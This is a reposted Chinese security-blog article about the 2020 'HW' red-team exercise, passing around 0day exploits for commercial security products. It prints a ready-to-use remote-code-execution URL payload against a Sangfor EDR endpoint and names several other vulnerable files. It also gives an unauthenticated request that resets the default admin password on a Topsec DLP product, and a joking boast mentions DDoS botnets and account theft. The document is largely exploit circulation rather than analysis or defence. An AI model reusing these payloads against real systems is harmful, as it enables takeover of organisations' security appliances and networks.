HW出圈了?不!是0day漫天飞了

admin 2020年8月18日13:12:36评论209 views字数 1356阅读4分31秒阅读模式

文章整理自网络!


2020HW刚开始,开局就天王炸 


直接上了几道硬菜,

HW出圈了?不!是0day漫天飞了


红队0day漫天飞,蓝队要忙的没时间吃饭,

HW出圈了?不!是0day漫天飞了



什么是红队蓝队?


攻击和防守两个队伍,一般叫红队和蓝队,攻击方的目标是拿下DNS服务器、OA系统服务器、工控系统服务器等的控制权。攻击手段包括weblogic的WLS的0day漏洞利用、4A服务器的0day漏洞攻击、致远OA服务器攻击、Struts 2漏洞攻击等。



深X信EDR

payload


https://ip:port/tool/log/c.php?strip_slashes=system&host=id


一打一个小朋友

HW出圈了?不!是0day漫天飞了


除上面之外,还有任意文件读取,验证码绕过,还有就是rce。


漏洞简单分析

RCE_1

漏洞文件:toollogc.php


通过URL传参初始化变量,经典的变量覆盖漏洞。

HW出圈了?不!是0day漫天飞了

HW出圈了?不!是0day漫天飞了



RCE_2

漏洞文件:toolphp_cli.php


同样的问题,感觉这个更过分了,bypass waf webshell?

HW出圈了?不!是0day漫天飞了



RCE_3

漏洞文件:toolldb_cli.php

HW出圈了?不!是0day漫天飞了



太多了。。。


任意文件读取

漏洞文件:storecat.php

HW出圈了?不!是0day漫天飞了

HW出圈了?不!是0day漫天飞了

 


天X信漏洞

漏洞影响:已知版本号v3.1130.308p3_DLP.1

风险等级:高

漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.

默认用户superman的uid=1

POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1



蓝队三大错觉,我能反杀,我能秀,我觉得死不了。结果,红队大佬牛B,一天给半个月活都干完了。这就叫,犀利红队,会注入,会上传,会Xss,会破解,会嗅探,会开发,会业务,会运维,渗透,社工,调戏客服MM,无不精通,祖传三代红队。电话通知后10秒钟上线,身体强壮可持续渗透7天7夜,上千万肉鸡Ddos流量永不停歇,上至深信服、360、融信、下至刷致远OA,刷泛微OA。备用电源,千兆光纤,无线网卡,永不断网,备用电脑一台,发电机二台(含柴油100升)。本人身体强壮,健步如飞,可连续编程20小时不休息,讨论技术方案5小时不喝水,上至带项目、出方案,下至盗号威胁pm,什么都能干。本人意识猥琐,技艺娴熟,0day丰富,能上各种渗透工具,怕延迟可直接接受电话指挥,语音指挥。全面漏洞认识深刻,熟练掌握各种渗透理论,认真学习过《白帽子讲web安全》《Metasploit渗透测试指南》《Web之困》等专业书籍。深山苦练30年,一天只睡4小时,脾气好,不喷人,操作虎,意识强,渗透快,shell多,能过狗,能过盾,听指挥,千里之外取服务器首级,瞬息之间爆管理员菊花,日站如杀鸡,压安全狗如压草芥,第一时间赶到渗透现场。


一个月改半月,半个月改一天,天秀吧?本来以为协同作战很流弊, 

HW出圈了?不!是0day漫天飞了



没想到呀!上来红队直接放0day大招。还是红队大佬牛逼呀,


参考文章

【ChaBug】https://mp.weixin.qq.com/s/Gpif-on5bB7ijCstfkA2-g【黑白之道】https://mp.weixin.qq.com/s/TyrRlKbj9NC_Lnht-VcDkw【黑白之道】https://mp.weixin.qq.com/s/d6S1-VbwMz1i5mj6IAU5Eg


“阅读原文”

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月18日13:12:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HW出圈了?不!是0day漫天飞了http://cn-sec.com/archives/93313.html

发表评论

匿名网友 填写信息